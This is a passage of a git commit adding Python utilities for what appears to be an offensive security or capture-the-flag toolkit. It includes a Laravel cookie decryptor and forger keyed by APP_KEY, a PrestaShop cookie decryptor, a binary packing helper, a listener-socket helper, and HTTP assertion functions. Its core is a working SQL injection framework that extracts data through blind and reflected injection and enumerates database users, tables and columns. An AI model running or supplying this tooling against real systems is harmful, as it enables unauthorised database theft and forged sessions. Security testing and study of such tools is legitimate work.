Repository restructuring

This commit is contained in:
2026-04-30 19:53:18 +02:00
parent 31af1f4423
commit f233fe8264
98 changed files with 4216 additions and 1392 deletions

0
utils/__init__.py Normal file
View File

148
utils/crypto_cookie.py Normal file
View File

@@ -0,0 +1,148 @@
import base64
import hashlib
import hmac
import json
import os
import re
import urllib.parse
from Crypto.Cipher import AES
def unpad(data):
    """Strip trailing padding (inverse of pad()).

    The final byte is treated as the pad length and removed only when it
    is a plausible length (< AES.block_size). Empty input passes through.
    """
    if not data:
        return data
    pad_len = data[-1]
    if pad_len < AES.block_size:
        return data[0:-pad_len]
    return data
def pad(data):
    """Append PKCS7-style padding up to AES.block_size.

    Unlike strict PKCS7, already block-aligned data is left unpadded
    (the computed pad length would equal the block size). Empty input
    passes through.
    """
    if not data:
        return data
    pad_len = AES.block_size - (len(data) % AES.block_size)
    if pad_len < AES.block_size:
        return data + bytes([pad_len]) * pad_len
    return data
def generate_mac(APP_KEY, iv, data):
    """Laravel-style cookie MAC: HMAC-SHA256 over base64(iv) || base64(value).

    Returns the hmac object; callers use .hexdigest().
    """
    message = base64.b64encode(iv) + base64.b64encode(data)
    return hmac.new(APP_KEY, message, hashlib.sha256)
def decrypt_cookie(APP_KEY, cookie):
    """Decrypt a Laravel-format cookie (URL-quoted base64 JSON {iv, value, mac}).

    The MAC is verified but a mismatch only prints a warning; returns the
    AES-CBC-decrypted, unpadded plaintext as str.
    """
    envelope = json.loads(base64.b64decode(urllib.parse.unquote(cookie)).decode())
    iv = base64.b64decode(envelope["iv"].encode())
    ciphertext = base64.b64decode(envelope["value"].encode())
    expected = generate_mac(APP_KEY, iv, ciphertext)
    if expected.hexdigest() != envelope["mac"]:
        print("[~] WARN: macs are not equal")
    aes = AES.new(APP_KEY, AES.MODE_CBC, iv)
    return unpad(aes.decrypt(ciphertext)).decode()
def create_cookie(APP_KEY, data):
    """Build a Laravel-format cookie: AES-CBC encrypt json(data), MAC it,
    and base64-encode the JSON envelope {iv, value, mac}."""
    iv = os.urandom(AES.block_size)
    aes = AES.new(APP_KEY, AES.MODE_CBC, iv)
    ciphertext = aes.encrypt(pad(json.dumps(data).encode()))
    mac = generate_mac(APP_KEY, iv, ciphertext)
    envelope = {
        "iv": base64.b64encode(iv).decode(),
        "value": base64.b64encode(ciphertext).decode(),
        "mac": mac.hexdigest()
    }
    # URL-quoting is intentionally left to the caller.
    # new_cookie = urllib.parse.quote(new_cookie)
    return base64.b64encode(json.dumps(envelope).encode()).decode()
def hkdf_extract(salt, input_key_material, hash_name='sha256'):
    """HKDF-Extract (RFC 5869): PRK = HMAC-Hash(salt, IKM).

    A missing or empty salt is replaced by a zero-filled string of the
    hash's digest size, exactly as the RFC prescribes.

    :param salt: The salt (bytes) or None.
    :param input_key_material: The input key material (bytes).
    :param hash_name: The hash function to use (string).
    :return: The pseudorandom key (bytes).
    """
    if not salt:
        salt = b'\x00' * hashlib.new(hash_name).digest_size
    return hmac.new(salt, input_key_material, hash_name).digest()
def hkdf_expand(pseudorandom_key, info=b'', length=32, hash_name='sha256'):
    """HKDF-Expand (RFC 5869): stretch the PRK into `length` bytes of OKM.

    T(i) = HMAC(PRK, T(i-1) || info || i) for i = 1..ceil(length/hash_len);
    the concatenated blocks are truncated to `length`.

    :param pseudorandom_key: The pseudorandom key (bytes).
    :param info: Optional context/application-specific information (bytes).
    :param length: The length of the output key material in bytes (int).
    :param hash_name: The hash function to use (string).
    :return: The output key material (bytes).
    """
    hash_len = hashlib.new(hash_name).digest_size
    blocks_needed = -(-length // hash_len)  # ceil division
    okm, block = b'', b''
    for i in range(1, blocks_needed + 1):
        block = hmac.new(pseudorandom_key, block + info + bytes([i]), hash_name).digest()
        okm += block
    return okm[:length]
def hkdf(input_key_material, salt, info=b'', length=32, hash_name='sha256'):
    """Full HKDF (RFC 5869): extract a PRK from IKM + salt, then expand it
    into `length` bytes of derived key material.

    :param input_key_material: The input key material (bytes).
    :param salt: The salt (bytes) or None.
    :param info: Optional context/application-specific information (bytes).
    :param length: The length of the output key material in bytes (int).
    :param hash_name: The hash function to use (string).
    :return: The derived key (bytes).
    """
    prk = hkdf_extract(salt, input_key_material, hash_name)
    return hkdf_expand(prk, info, length, hash_name)
def decrypt_cookie_prestashop(COOKIE_KEY, cookie):
    """Decrypt a PrestaShop cookie sealed with defuse/php-encryption v2.

    :param COOKIE_KEY: hex string of the shop key blob (version header +
        32-byte raw key + 32-byte sha256 checksum).
    :param cookie: hex string of the encrypted blob
        (version | salt | IV | ciphertext | HMAC).
    :return: dict of cookie fields; the plaintext is "name|value" pairs
        separated by the '¤' character.
    """
    assert re.match(r"^[a-fA-F0-9]+$", COOKIE_KEY)
    assert re.match(r"^[a-fA-F0-9]+$", cookie)
    # Key blob layout, see:
    # https://github.com/defuse/php-encryption/blob/master/src/Key.php
    KEY_CURRENT_VERSION = b"\xDE\xF0\x00\x00"
    HEADER_SIZE = len(KEY_CURRENT_VERSION)
    KEY_BYTE_SIZE = 32
    CHECKSUM_BYTE_SIZE = 32
    COOKIE_KEY = bytearray.fromhex(COOKIE_KEY)
    assert COOKIE_KEY.startswith(KEY_CURRENT_VERSION)
    assert len(COOKIE_KEY) == HEADER_SIZE + KEY_BYTE_SIZE + CHECKSUM_BYTE_SIZE
    # Split header | raw key | checksum; checksum covers header + raw key.
    real_cookie_key = COOKIE_KEY[HEADER_SIZE:HEADER_SIZE+KEY_BYTE_SIZE]
    cookie_signature_check = COOKIE_KEY[0:HEADER_SIZE+KEY_BYTE_SIZE]
    key_signature = COOKIE_KEY[HEADER_SIZE+KEY_BYTE_SIZE:]
    assert hashlib.sha256(cookie_signature_check).digest() == key_signature
    # Ciphertext blob layout, see:
    # https://github.com/defuse/php-encryption/blob/master/src/Core.php
    CURRENT_VERSION = b"\xDE\xF5\x02\x00"
    HEADER_SIZE = len(CURRENT_VERSION)
    SALT_SIZE = 32
    IV_SIZE = 16
    HMAC_SIZE = 32
    cookie = bytearray.fromhex(cookie)
    assert cookie.startswith(CURRENT_VERSION)
    assert len(cookie) >= HEADER_SIZE + SALT_SIZE + IV_SIZE + HMAC_SIZE
    salt = cookie[HEADER_SIZE:HEADER_SIZE+SALT_SIZE]
    iv = cookie[HEADER_SIZE+SALT_SIZE:HEADER_SIZE+SALT_SIZE+IV_SIZE]
    ct = cookie[HEADER_SIZE+SALT_SIZE+IV_SIZE:-HMAC_SIZE]
    hmac_data = cookie[-HMAC_SIZE:]
    PBKDF2_ITERATIONS = 100000  # NOTE(review): declared but unused in this path
    ENCRYPTION_INFO_STRING = b'DefusePHP|V2|KeyForEncryption'
    AUTHENTICATION_INFO_STRING = b'DefusePHP|V2|KeyForAuthentication'
    # Per-message encryption key: HKDF-SHA256 keyed with the blob's salt.
    derived_key = hkdf(real_cookie_key, salt, ENCRYPTION_INFO_STRING, 32, "sha256")
    # AES-256-CTR with the IV as the full initial counter block.
    cipher = AES.new(derived_key, AES.MODE_CTR, initial_value=iv, nonce=b"")
    plaintext = cipher.decrypt(ct).decode()
    # TODO: check hmac_data (AUTHENTICATION_INFO_STRING would derive the MAC key)
    lines = plaintext.split("¤")
    return dict(map(lambda line: line.split("|"), lines))

133
utils/packeter.py Normal file
View File

@@ -0,0 +1,133 @@
import struct
class StructWrapper:
    """Shared helpers for the Parser/Packer pair built on struct."""
    @staticmethod
    def _endian(e):
        # struct prefix: ">" = big-endian, "<" = little-endian
        return ">" if e else "<"
    @staticmethod
    def _format_size(f):
        # byte width of each supported struct format character
        sizes = {"c": 1, "h": 2, "H": 2, "i": 4, "I": 4, "q": 8, "Q": 8}
        assert f in sizes
        return sizes[f]
class Parser(StructWrapper):
    """Sequential binary reader over a bytes buffer.

    A per-call big_endian argument overrides the default chosen at
    construction time (None means "use the instance default").
    """
    def __init__(self, data, big_endian=False):
        self.data = data
        self.offset = 0
        self.big_endian = big_endian
    def eof(self):
        # True once every byte has been consumed.
        return self.offset >= len(self.data)
    def remaining_size(self):
        # Bytes not yet consumed (without copying the tail slice).
        return max(0, len(self.data) - self.offset)
    def _struct_unpack(self, big_endian, f):
        size = self._format_size(f)
        assert self.remaining_size() >= size
        # grab default endianess, when none is given
        if big_endian is None:
            big_endian = self.big_endian
        value = struct.unpack(self._endian(big_endian) + f, self.data[self.offset:self.offset+size])[0]
        self.offset += size
        return value
    def read_byte(self, big_endian=None):
        # BUGFIX: 'big_endian' used to be an undefined global name here
        # (NameError on every call); it is now a proper parameter.
        return self._struct_unpack(big_endian, "c")
    def read_char(self):
        # BUGFIX: struct "c" yields a 1-byte bytes object; chr() needs an
        # int, so take the byte's ordinal value instead.
        return chr(self.read_byte()[0])
    def read_signed_short(self, big_endian=None):
        return self._struct_unpack(big_endian, "h")
    def read_unsigned_short(self, big_endian=None):
        return self._struct_unpack(big_endian, "H")
    def read_signed_int(self, big_endian=None):
        return self._struct_unpack(big_endian, "i")
    def read_unsigned_int(self, big_endian=None):
        return self._struct_unpack(big_endian, "I")
    def read_signed_long(self, big_endian=None):
        return self._struct_unpack(big_endian, "q")
    def read_unsigned_long(self, big_endian=None):
        return self._struct_unpack(big_endian, "Q")
    def read_bin(self, length):
        # Raw byte run; bounds-checked before consuming.
        assert self.remaining_size() >= length
        d = self.data[self.offset:self.offset+length]
        self.offset += length
        return d
    def read_until(self, byte):
        """Consume bytes until `byte` (a 1-byte bytes value) or EOF; the
        delimiter is consumed but not returned."""
        data = b""
        while not self.eof():
            c = self.read_byte()
            if c == byte:
                break
            data += c
        return data
class Packer(StructWrapper):
    """Sequential binary writer accumulating a bytes buffer.

    A per-call big_endian argument overrides the default chosen at
    construction time (None means "use the instance default").
    """
    def __init__(self, big_endian=False):
        self.buffer = b""
        self.offset = 0
        self.big_endian = big_endian
    def get(self):
        # The bytes written so far.
        return self.buffer
    def length(self):
        return len(self.buffer)
    def _struct_pack(self, big_endian, f, value):
        # grab default endianess, when none is given
        if big_endian is None:
            big_endian = self.big_endian
        size = self._format_size(f)
        self.buffer += struct.pack(self._endian(big_endian) + f, value)
        self.offset += size
    def write_byte(self, value, big_endian=None):
        # BUGFIX: 'big_endian' used to be an undefined global (NameError).
        self._struct_pack(big_endian, "c", value)
    def write_char(self, value, big_endian=None):
        # BUGFIX: same undefined 'big_endian' global as write_byte.
        self._struct_pack(big_endian, "c", value.encode())
    def write_signed_short(self, value, big_endian=None):
        # BUGFIX: was packed with format "c" (1 byte) instead of "h".
        self._struct_pack(big_endian, "h", value)
    def write_unsigned_short(self, value, big_endian=None):
        self._struct_pack(big_endian, "H", value)
    def write_signed_int(self, value, big_endian=None):
        # BUGFIX: called the non-existent _struct_unpack (AttributeError).
        self._struct_pack(big_endian, "i", value)
    def write_unsigned_int(self, value, big_endian=None):
        self._struct_pack(big_endian, "I", value)
    def write_signed_long(self, value, big_endian=None):
        self._struct_pack(big_endian, "q", value)
    def write_unsigned_long(self, value, big_endian=None):
        self._struct_pack(big_endian, "Q", value)
    # Backward-compatible alias for the original (typo'd) method name.
    rwrite_unsigned_long = write_unsigned_long
    def write_bin(self, value):
        self.buffer += value
        self.offset += len(value)
    def write_string(self, value, encoding="UTF-8"):
        self.write_bin(value.encode(encoding))

355
utils/sqli.py Normal file
View File

@@ -0,0 +1,355 @@
from abc import ABC, abstractmethod
import sys
import string
class SQLi(ABC):
@staticmethod
def build_query(column: str|list, table=None, condition=None, offset=None, limit=1):
query = "SELECT "
query += column if isinstance(column, str) else ",".join(column)
query += "" if not table else f" FROM {table}"
query += "" if not condition else f" WHERE {condition}"
query += "" if limit is None else f" LIMIT {limit}"
query += "" if offset is None or limit is None else f" OFFSET {offset}"
return query
def extract_multiple_ints(self, column: str, table=None, condition=None, limit=None, verbose=False):
row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
for i in range(0, row_count):
rows.append(self.extract_int(column, table, condition, i, verbose=verbose))
return rows
def extract_multiple_strings(self, column: str, table=None, condition=None, limit=None, verbose=False):
row_count = self.extract_int(f"COUNT({column})", table=table, condition=condition, verbose=verbose)
if limit is not None:
row_count = min(limit, row_count)
if verbose:
print(f"Fetching {row_count} rows")
rows = []
for i in range(0, row_count):
rows.append(self.extract_string(column, table, condition, i, verbose=verbose))
return rows
def substring(self, what, offset: int, size: int):
return f"substr({what},{offset},{size})"
def ascii(self, what):
return f"ascii({what})"
@abstractmethod
def extract_int(self, column: str, table=None, condition=None,
offset=None, verbose=False):
pass
@abstractmethod
def extract_string(self, column: str, table=None, condition=None, offset=None, verbose=False):
pass
@abstractmethod
def get_database_version(self, verbose=False):
pass
@abstractmethod
def get_current_user(self, verbose=False):
pass
@abstractmethod
def get_current_database(self, verbose=False):
pass
@abstractmethod
def get_table_names(self, schema: str, verbose=False):
pass
@abstractmethod
def get_column_names(self, table: str, schema: str, verbose=False):
pass
class ReflectedSQLi(SQLi, ABC):
    """SQLi variant where query results are reflected back into the response.

    `column_types` lists the Python types (int/str) of the columns the
    injected SELECT must produce for its output to be reflected; requested
    values are slotted into a compatible reflected column.
    """
    def __init__(self, column_types: list):
        self.column_types = column_types
        # Wraps filler column indices into quoted placeholder literals.
        self.placeholder_fn = lambda c: f"'{c}'"
    @abstractmethod
    def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
        # Run the injection selecting `columns`; return the reflected row.
        pass
    def extract_int(self, column: str, table=None, condition=None, offset=None, verbose=False):
        # Prefer a reflected str column (then parse), else use an int slot.
        if str in self.column_types:
            return int(self.extract_string(column, table, condition, offset))
        elif int not in self.column_types:
            print("[!] Reflectd SQL does neither reflect string nor int types, only:", self.column_types)
            return None
        int_column = self.column_types.index(int)
        query_columns = list(map(self.placeholder_fn, range(len(self.column_types))))
        query_columns[int_column] = column
        return int(self.reflected_sqli(query_columns, table, condition, offset)[int_column])
    def extract_string(self, column: list|str, table=None, condition=None, offset=None, verbose=False):
        if str not in self.column_types:
            if isinstance(column, str) and int in self.column_types:
                # Fallback: no str slot reflected — leak the string one
                # character code at a time through the int slot.
                print("[!] Reflectd SQL does not reflect string types, querying char-by-char")
                str_length = self.extract_int(f"LENGTH({column})", table=table, condition=condition, offset=offset, verbose=verbose)
                if verbose:
                    print(f"Querying {str_length} chars")
                result = ""
                for i in range(1,str_length+1):
                    q = self.ascii(self.substring(column, i, 1))
                    c = chr(self.extract_int(q, table=table, condition=condition, offset=offset, verbose=verbose))
                    if verbose:
                        sys.stdout.write(c)
                        sys.stdout.flush()
                    result += c
                return result
            else:
                print("[!] Reflectd SQL does not reflect string types, only:", self.column_types)
                return None
        str_column = self.column_types.index(str)
        query_columns = list(map(self.placeholder_fn, range(len(self.column_types))))
        query_columns[str_column] = column
        return self.reflected_sqli(query_columns, table, condition, offset)[str_column]
    def extract_multiple_ints(self, columns: list|str, table=None, condition=None, limit=None, verbose=False):
        # Fetch several int columns per row; a single str argument yields
        # a flat list of ints instead of per-row lists.
        one = False
        if isinstance(columns, str):
            columns = [columns]
            one = True
        column_count = len(columns)
        if len(self.column_types) < column_count:
            print(f"[!] Reflectd SQL does not reflect required amount of columns. required={column_count}, got={len(self.column_types)}")
            return None
        # Remaining slots are filled with 1-based index literals.
        query_columns = columns + list(map(str, range(column_count + 1, len(self.column_types) + 1)))
        row_count = self.extract_int(f"COUNT(*)", table=table, condition=condition, verbose=verbose)
        if limit is not None:
            row_count = min(limit, row_count)
        if verbose:
            print(f"Fetching {row_count} rows")
        rows = []
        column_str = ",".join(query_columns)  # NOTE(review): built but never used
        for i in range(0, row_count):
            row = self.reflected_sqli(query_columns, table, condition, i, verbose=verbose)
            if one:
                rows.append(int(row[0]))
            else:
                rows.append(list(map(lambda i: int(row[i]), range(column_count))))
        return rows
    def extract_multiple_strings(self, columns: list|str, table=None, condition=None, limit=None, verbose=False):
        # Fetch several str columns per row, mapping each requested column
        # onto the next available str-typed reflected slot.
        one = False
        if isinstance(columns, str):
            columns = [columns]
            one = True
        column_count = len(columns)
        if self.column_types.count(str) < column_count:
            print(f"[!] Reflectd SQL does not reflect required amount of string columns. required={column_count}, got={self.column_types.count(str)}")
            return None
        query_columns = list(map(str, range(1, len(self.column_types) + 1)))
        offsets = list(None for _ in range(column_count))
        offset = 0
        for i, column in enumerate(columns):
            # Advance to the next str-typed slot for this column.
            while self.column_types[offset] != str:
                offset += 1
            offsets[i] = offset
            query_columns[offset] = column
            offset += 1
        column_str = ",".join(query_columns)  # NOTE(review): built but never used
        # todo: fix count(*) for distinct
        row_count = self.extract_int(f"COUNT(*)", table=table, condition=condition, verbose=verbose)
        if limit is not None:
            row_count = min(limit, row_count)
        if verbose:
            print(f"Fetching {row_count} rows")
        rows = []
        for i in range(0, row_count):
            row = self.reflected_sqli(query_columns, table, condition, i, verbose=verbose)
            if one:
                rows.append(row[offsets[0]])
            else:
                rows.append(list(map(lambda o: row[o], offsets)))
        return rows
    @classmethod
    def guess_reflected_columns(cls, callback, verbose=False):
        """Probe with an increasing number of marker columns until `callback`
        reflects something, then record which markers appear in the output.

        NOTE(review): marker presence only proves a str slot; int slots
        cannot be distinguished this way (they come back as None).
        """
        data = None
        column_count = 1
        while data is None:
            if verbose:
                print(f"[ ] Trying with {column_count} columns")
            query_columns = list(map(lambda c: f"'column-{c}-sqli'", range(column_count)))
            query_str = cls.build_query(query_columns)
            data = callback(query_str) # should return some kind of text for a given query
            if not data:
                column_count += 1
                continue
        reflected_columns = []
        for c in range(column_count):
            column_name = f"column-{c}-sqli"
            reflected_columns.append(str if column_name in data else None) # how to guess the type (str/int)?
        return reflected_columns
    # todo: extract_multiple with columns as dict (name -> type), e.g. extract_multiple({"id": int, "name": str})
class BlindSQLi(SQLi, ABC):
    """SQLi variant that can only ask yes/no questions (boolean-blind).

    Values are reconstructed from comparison oracles: ints by linear or
    binary search, strings character by character.
    """
    @abstractmethod
    def blind_sqli(self, condition: str, verbose=False) -> bool:
        # Return True iff injecting `condition` makes the query succeed.
        pass
    def extract_int(self, column: str, table=None, condition=None,
                    offset=None, verbose=False, binary_search=True,
                    min_value=None, max_value=None):
        """Recover an integer via comparison oracles.

        With binary_search=False the value is walked upward one by one
        (aborting with None once max_value is reached); otherwise the upper
        bound is doubled until the value fits, then the range is bisected.
        """
        query = self.build_query(column, table, condition, offset)
        # Cheap special case before searching.
        if self.blind_sqli(f"({query})=0"):
            return 0
        if not binary_search:
            cur_int = 1 if min_value is None else min_value
            while self.blind_sqli(f"({query})>{cur_int}", verbose):
                cur_int += 1
                if max_value is not None and cur_int >= max_value:
                    return None
            return cur_int
        else:
            if min_value is None or max_value is None:
                min_value = 1 if min_value is None else min_value
                max_value = 1 if max_value is None else max_value
                # Grow the window exponentially until the value is inside it.
                while self.blind_sqli(f"({query})>{max_value}", verbose):
                    min_value = max_value + 1
                    max_value = max_value * 2
            while True:
                cur_int = (min_value + max_value) // 2
                if self.blind_sqli(f"({query})>{cur_int}", verbose):
                    min_value = cur_int + 1
                elif self.blind_sqli(f"({query})<{cur_int}", verbose):
                    max_value = cur_int - 1
                else:
                    return cur_int
    def extract_string(self, column: str, table=None, condition=None, offset=None, verbose=False, max_length=None, charset=string.printable, cur_str=""):
        """Recover a string one character at a time.

        With a charset each position is probed char by char; without one the
        character code is binary-searched in [0,127]. `cur_str` may seed an
        already-known prefix (its length decides the next position probed).
        """
        if max_length is None:
            max_length = self.extract_int(f"LENGTH({column})", table, condition, offset, verbose=verbose)
            if verbose:
                print("Fetched length:", max_length)
        while True:
            found = False
            # Expression for the code point of the next unknown character.
            cur_column = self.ascii(self.substring(column, len(cur_str) + 1, 1))
            if charset:
                query = self.build_query(cur_column, table, condition, offset)
                for c in charset:
                    if self.blind_sqli(f"({query})={ord(c)}"):
                        found = True
                        cur_str += c
                        if verbose:
                            sys.stdout.write(c)
                            sys.stdout.flush()
                        break
            else:
                # No charset: binary-search the ASCII code directly.
                c = self.extract_int(cur_column, table, condition, min_value=0, max_value=127)
                if c is not None:
                    found = True
                    cur_str += chr(c)
                    if verbose:
                        sys.stdout.write(chr(c))
                        sys.stdout.flush()
            if not found or (max_length is not None and len(cur_str) >= max_length):
                break
        if verbose:
            print()
        return cur_str
class PostgreSQLi(SQLi, ABC):
    """PostgreSQL-flavoured metadata queries on top of a SQLi primitive."""
    def get_database_version(self, verbose=False):
        return self.extract_string("VERSION()", verbose=verbose)
    def get_current_user(self, verbose=False):
        return self.extract_string("current_user", verbose=verbose)
    def get_current_database(self, verbose=False):
        return self.extract_string("current_database()", verbose=verbose)
    def get_table_names(self, schema: str = "public", verbose=False):
        condition = f"table_schema='{schema}'"
        return self.extract_multiple_strings("table_name", "information_schema.tables",
                                             condition, verbose=verbose)
    def get_column_names(self, table: str, schema: str = "public", verbose=False):
        condition = f"table_schema='{schema}' AND table_name='{table}'"
        return self.extract_multiple_strings("column_name", "information_schema.columns",
                                             condition, verbose=verbose)
class MySQLi(SQLi, ABC):
    """MySQL-flavoured metadata queries on top of a SQLi primitive."""
    def get_database_version(self, verbose=False):
        return self.extract_string("VERSION()", verbose=verbose)
    def get_current_user(self, verbose=False):
        return self.extract_string("USER()", verbose=verbose)
    def get_current_database(self, verbose=False):
        return self.extract_string("DATABASE()", verbose=verbose)
    def get_table_names(self, schema: str, verbose=False):
        condition = f"table_schema='{schema}'"
        return self.extract_multiple_strings("table_name", "information_schema.tables",
                                             condition, verbose=verbose)
    def get_column_names(self, table: str, schema: str, verbose=False):
        condition = f"table_schema='{schema}' AND table_name='{table}'"
        return self.extract_multiple_strings("column_name", "information_schema.columns",
                                             condition, verbose=verbose)
class SQLitei(SQLi, ABC):
    """SQLite-flavoured metadata queries on top of a SQLi primitive."""
    def get_database_version(self, verbose=False):
        return self.extract_string("sqlite_version()", verbose=verbose)
    def get_current_user(self, verbose=False):
        raise Exception("Not implemented!")
    def get_current_database(self, verbose=False):
        raise Exception("Not implemented!")
    def get_table_names(self, verbose=False):
        return self.extract_multiple_strings("name", "sqlite_schema", "type='table'",
                                             verbose=verbose)
    def get_column_names(self, table: str, schema: str, verbose=False):
        # TODO: we could query the "sql" column and parse it using regex
        raise Exception("Not implemented!")
    def ascii(self, what):
        # SQLite has no ascii(); unicode() is its equivalent.
        return f"unicode({what})"

547
utils/util.py Executable file
View File

@@ -0,0 +1,547 @@
#!/usr/bin/env python
import random
import math
import socket
import base64
import itertools
import netifaces as ni
import string
import sys
import os
import io
import re
import json
import urllib.parse
def hex_dump(data, column_size=16):
    """Print a classic hex dump of `data`: offset | hex bytes | ASCII.

    Non-printable bytes are shown as '.' in the ASCII column; short final
    rows keep the columns aligned.
    """
    printables = (string.ascii_letters + string.digits + string.punctuation).encode()
    for offset in range(0, len(data), column_size):
        row = data[offset:offset+column_size]
        as_string = "".join("." if bytes([b]) not in printables else chr(b) for b in row)
        as_hex = " ".join("%02x" % b for b in row)
        if len(row) < column_size:
            as_hex += " " * 3 * (column_size - len(row))
        # BUGFIX: the offset used to be printed as i * column_size even
        # though the loop variable already advances in column_size steps,
        # so every row after the first showed a wrong address.
        print("%08x" % offset, "|", as_hex, "|", as_string)
def is_port_in_use(port):
    """Return True when something accepts TCP connections on 127.0.0.1:`port`."""
    import socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with sock:
        # connect_ex returns 0 on success instead of raising
        return sock.connect_ex(("127.0.0.1", port)) == 0
def nvl(a, b):
    """SQL NVL semantics: return `b` when `a` is None, otherwise `a`."""
    if a is None:
        return b
    return a
def get_payload_path(path=""):
    """Resolve `path` relative to this module's directory (absolute, symlinks resolved)."""
    base = os.path.dirname(__file__)
    return os.path.realpath(os.path.join(base, path))
def get_address(interface={"tun0", "vpn0"}):
    """Return the first non-loopback IPv4 address via netifaces.

    :param interface: an interface name, or a collection of candidate
        names of which the first one present on the system wins.
        NOTE(review): a mutable default argument, but it is only read,
        never mutated.
    :return: IPv4 address string, or None when no candidate matched and
        no other interface had a usable address.
    """
    if not isinstance(interface, str):
        # Pick the first requested interface that actually exists.
        requested = set(interface)
        available = set(ni.interfaces())
        interfaces = list(requested.intersection(available))
        interface = None if not interfaces else interfaces[0]
    # not found or not specified, take the first available, which is not loopback
    if not interface in ni.interfaces():
        interfaces = ni.interfaces()
        for interface in interfaces:
            if interface == "lo":
                continue
            # NOTE(review): interfaces without an IPv4 entry would raise
            # KeyError on ni.AF_INET here — confirm against netifaces docs.
            addresses = ni.ifaddresses(interface)
            addresses = [addresses[ni.AF_INET][i]["addr"] for i in range(len(addresses[ni.AF_INET]))]
            addresses = [addr for addr in addresses if not str(addr).startswith("127")]
            if addresses:
                return addresses[0]
        # Falls through returning None after this message.
        print("[-] Could not find a network interface card with a valid ipv4")
    else:
        addresses = ni.ifaddresses(interface)
        addresses = [addresses[ni.AF_INET][i]["addr"] for i in range(len(addresses[ni.AF_INET]))]
        addresses = [addr for addr in addresses if not str(addr).startswith("127")]
        return addresses[0]
def generate_random_string(length=16, charset=string.printable):
    """Return `length` characters drawn with replacement from `charset`.

    Uses the `random` module, so NOT suitable for secrets.
    """
    return "".join(random.choices(charset, k=length))
def exit_with_error(res, err):
    """Print `err` (or err(res) when `err` is callable) and terminate the process."""
    message = err(res) if callable(err) else err
    print(message)
    exit()
def assert_status_code(res, status_code, err=None):
    """Exit with `err` unless res.status_code matches `status_code`.

    :param status_code: a single int, or any iterable of acceptable ints.
    :param err: custom message or callable; a default message is built
        when None.
    """
    if isinstance(status_code, int):
        if res.status_code != status_code:
            err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected: {status_code}" if err is None else err
            exit_with_error(res, err)
    elif hasattr(status_code, '__iter__') and res.status_code not in status_code:
        # BUGFIX: ','.join over a collection of ints raised TypeError;
        # each code must be stringified first.
        err = f"[-] '{res.url}' returned unexpected status code {res.status_code}, expected one of: {','.join(map(str, status_code))}" if err is None else err
        exit_with_error(res, err)
def assert_location(res, location, err=None):
    """Exit with `err` unless the Location header equals `location` (case-insensitive)."""
    assert_header_present(res, "Location")
    got = res.headers["Location"].lower()
    if got != location.lower():
        err = f"[-] '{res.url}' returned unexpected location {got}, expected: {location}" if err is None else err
        exit_with_error(res, err)
def assert_content_type(res, content_type, err=None):
    """Exit with `err` unless Content-Type matches `content_type`.

    Comparison is case-insensitive and ignores parameters after ';'
    (e.g. charset).
    """
    assert_header_present(res, "Content-Type")
    got = res.headers["Content-Type"].lower()
    expected = content_type.lower()
    if got == expected or got.startswith(expected + ";"):
        return
    err = f"[-] '{res.url}' returned unexpected content type {got}, expected: {content_type}" if err is None else err
    exit_with_error(res, err)
def assert_header_present(res, header, err=None):
    """Exit with `err` unless `header` occurs in res.headers."""
    if header not in res.headers:
        err = f"[-] '{res.url}' did not return header: {header}" if err is None else err
        exit_with_error(res, err)
def assert_empty(res, err=None):
    """Exit with `err` unless the response body is empty (or None)."""
    if res.content:
        err = f"[-] '{res.url}' returned unexpected data" if err is None else err
        exit_with_error(res, err)
def assert_not_empty(res, err=None):
    """Exit with `err` unless the response body contains at least one byte."""
    if len(res.content) == 0:
        err = f"[-] '{res.url}' did not return any data" if err is None else err
        exit_with_error(res, err)
def assert_content_contains(res, data, err=None):
    """Exit with `err` unless `data` (str or bytes) occurs in the response body.

    Returns True on success.
    """
    assert_not_empty(res)
    if isinstance(data, str):
        # BUGFIX: a str needle that was absent used to fall through into a
        # `str in bytes` membership test, raising TypeError instead of
        # reporting the mismatch.
        if data in res.text:
            return True
    elif data in res.content:
        return True
    err = f"[-] '{res.url}' did not include '{data}' in response" if err is None else err
    exit_with_error(res, err)
def assert_cookie_present(res, cookie_name, err=None):
    """Exit with `err` unless the response sets cookie `cookie_name`.

    Returns True on success.
    """
    assert_header_present(res, "Set-Cookie")
    if cookie_name in res.cookies:
        return True
    err = f"[-] '{res.url}' did not set-cookie '{cookie_name}'" if err is None else err
    exit_with_error(res, err)
def assert_json_path(res, path, value, err=None):
    """Exit with `err` unless the JSON body holds `value` at dotted `path`.

    Path segments are dict keys; a segment of the form "[N]" indexes into
    a list.
    """
    assert_content_type(res, "application/json")
    assert_not_empty(res)
    node = json.loads(res.text)
    for key in filter(None, path.split(".")):
        index = re.match(r"\[([0-9]+)\]", key)
        if index:
            key = int(index[1])
        node = node[key]
    if node != value:
        err = f"[-] '{res.url}' value at path '{path}' does not match. got={node} expected={value}" if err is None else err
        exit_with_error(res, err)
def assert_regex_match(pattern, data, err=None):
    """Exit with `err` unless `pattern` matches the start of `data`.

    Returns the match object on success; `pattern` may be a string or a
    pre-compiled re.Pattern.
    """
    compiled = pattern if isinstance(pattern, re.Pattern) else re.compile(pattern)
    match = compiled.match(data)
    if match is None:
        err = f"[-] Data does not match pattern '{compiled}': '{data}'" if err is None else err
        exit_with_error(None, err)
    return match
def open_server(address, ports=None, retry=False):
    """Bind and listen on a TCP socket; return the listening socket.

    :param ports: int (fixed port), range (random pick within), list/tuple
        (random choice), or None (random 10000-65535).
    :param retry: keep retrying (1 s apart) on bind failure; a fixed int
        port disables retrying.
    """
    import time  # BUGFIX: time was used below but never imported in this file
    listen_port = None
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    while True:
        if isinstance(ports, int):
            listen_port = ports
            retry = False
        elif isinstance(ports, range):
            listen_port = random.randint(ports[0], ports[-1])
        elif isinstance(ports, (list, tuple)):
            # Generalization: an explicit collection of candidate ports.
            listen_port = random.choice(ports)
        elif ports is None:
            listen_port = random.randint(10000, 65535)
        try:
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            sock.bind((address, listen_port))
            sock.listen(1)
            return sock
        except Exception as e:
            if retry:
                print("[-] Unable to listen on port %d: %s, Retrying…" % (listen_port, str(e)))
                time.sleep(1.0)
            else:
                raise e
class Stack:
